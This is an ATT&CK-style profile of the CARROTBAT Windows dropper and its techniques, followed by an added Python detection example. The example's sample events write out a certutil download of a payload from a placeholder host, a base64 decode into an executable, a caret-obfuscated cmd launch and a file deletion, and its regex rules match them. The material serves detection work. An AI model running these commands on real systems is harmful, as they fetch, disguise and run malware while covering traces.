CARROTBAT

CARROTBAT is a customized dropper that has been in use since at least 2017. CARROTBAT has been used to install SYSCON and has infrastructure overlap with KONNI.[1][2]

ID: S0462
Type: MALWARE
Platforms: Windows
Version: 1.2
Created: 02 June 2020
Last Modified: 11 April 2024

Techniques Used

Domain ID Name Use
Enterprise T1059.003 Command and Scripting Interpreter: Windows Command Shell

CARROTBAT has the ability to execute command line arguments on a compromised host.[2]

Enterprise T1027.010 Obfuscated Files or Information: Command Obfuscation

CARROTBAT has the ability to execute obfuscated commands on the infected host.[1]

Enterprise T1027.013 Obfuscated Files or Information: Encrypted/Encoded File

CARROTBAT has the ability to download a base64 encoded payload.[1]

Enterprise T1070.004 Indicator Removal: File Deletion

CARROTBAT has the ability to delete downloaded files from a compromised host.[1]

Enterprise T1082 System Information Discovery

CARROTBAT has the ability to determine the operating system of the compromised host and whether Windows is being run with x86 or x64 architecture.[1][2]

Enterprise T1105 Ingress Tool Transfer

CARROTBAT has the ability to download and execute a remote file via certutil.[1]
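The certutil download, base64 decode, cmd.exe obfuscation and file-deletion behaviours listed above, turned into a small detection routine over constructed Sysmon-style process-creation events. This is an added example, not part of the ATT&CK entry or of any vendor's code; the sample events, paths, URL and rule patterns are assumptions made for illustration.

```python
"""Map CARROTBAT-style command lines to ATT&CK technique IDs (added example)."""
import re

# Constructed sample events (Sysmon Event ID 1 style); paths and URL are placeholders.
EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -urlcache -split -f http://example.invalid/payload.txt C:\Users\Public\p.txt"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -decode C:\Users\Public\p.txt C:\Users\Public\p.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c s^t^a^r^t C:\Users\Public\p.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c del /f /q C:\Users\Public\p.txt"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\alice\notes.txt"},
]

# (technique ID, description, pattern over the command line); patterns are assumptions.
RULES = [
    ("T1105", "certutil fetching a remote file over HTTP(S)",
     re.compile(r"certutil(?:\.exe)?\b.*-urlcache\b.*https?://", re.I)),
    ("T1027.013", "certutil decoding a base64-encoded file",
     re.compile(r"certutil(?:\.exe)?\b.*-decode\b", re.I)),
    ("T1027.010", "caret-separated characters inside a cmd.exe command line",
     re.compile(r"cmd(?:\.exe)?\b.*\^\w\^", re.I)),
    ("T1070.004", "cmd.exe deleting a file",
     re.compile(r"cmd(?:\.exe)?\b.*\bdel\b", re.I)),
]


def classify(event):
    """Return the sorted technique IDs whose rule matches the event's command line."""
    cmd = event.get("CommandLine", "")
    return sorted(tid for tid, _desc, pat in RULES if pat.search(cmd))


def downloaded_then_deleted(events):
    """Correlate T1105 with T1070.004: paths certutil fetched that cmd.exe later deleted.

    The fetch destination is taken as the last token of the certutil command line.
    """
    fetched, hits = [], []
    for event in events:  # events are assumed to be in chronological order
        cmd = event.get("CommandLine", "")
        tids = classify(event)
        if "T1105" in tids:
            fetched.append(cmd.split()[-1].lower())
        elif "T1070.004" in tids:
            hits.extend(path for path in fetched if path in cmd.lower())
    return hits
```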

References